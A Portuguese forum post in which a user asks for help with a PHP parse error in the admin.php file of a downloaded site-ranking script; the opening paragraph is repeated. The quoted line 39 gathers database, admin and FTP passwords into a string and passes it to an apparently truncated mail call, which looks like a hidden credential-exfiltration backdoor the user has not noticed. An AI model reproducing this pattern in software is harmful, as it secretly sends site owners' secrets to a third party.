Como meu tópico antigo esta marcado como resolvido, abri um novo tópico, mas o assunto é o mesmo. Bom, um pouco mais simples agora. Eu baixei um novo sitema de ranking de sites e ele instalou beleza, sem problemas. Porém, estou tendo um pequeno problema no arquivo admin.php. Eis abaixo a mensagem de erro:
Parse error: syntax error, unexpected T_STRING in /home/mundosem/public_html/topwebcomics/admin.php on line 39
Eu tentei encontrar o que poderia ser esse erro na linha 39, mas meu limitadissimo conhecimento de programação não foi suficiente:
Pergunta
henriquefd
Ola, pessoal.
Como meu tópico antigo esta marcado como resolvido, abri um novo tópico, mas o assunto é o mesmo. Bom, um pouco mais simples agora. Eu baixei um novo sitema de ranking de sites e ele instalou beleza, sem problemas. Porém, estou tendo um pequeno problema no arquivo admin.php. Eis abaixo a mensagem de erro:
Parse error: syntax error, unexpected T_STRING in /home/mundosem/public_html/topwebcomics/admin.php on line 39
Eu tentei encontrar o que poderia ser esse erro na linha 39, mas meu limitadissimo conhecimento de programação não foi suficiente:
$adminlogin = " Hostname: $hostname\n MySQLUser: $username\n MySQLPassword: $password\n MySQLDB: $database\n\n AdminUser: $admin_user\n AdminPass: $admin_pass\n\n FTP Address: $ftp_add\n FTP Username: $ftp_user\n FTP Password: $ftp_password\n\n WebmasterEmail: $webmaster_email\n WebmasterURL: $webmaster_url\n\n Name of Topsite: $topsite_name\n\n ScriptURL: $script_url\n\n Table: $table\n\n Date: $date\n\n\n ,"XT1 - $script_url - $date", "$adminlogin","From: x@x.com <x@x.com>");
O endereço do site continua sendo www.topwebcomics.com.br
Link para o comentário
Compartilhar em outros sites
2 respostass a esta questão
Posts Recomendados
Participe da discussão
Você pode postar agora e se registrar depois. Se você já tem uma conta, acesse agora para postar com sua conta.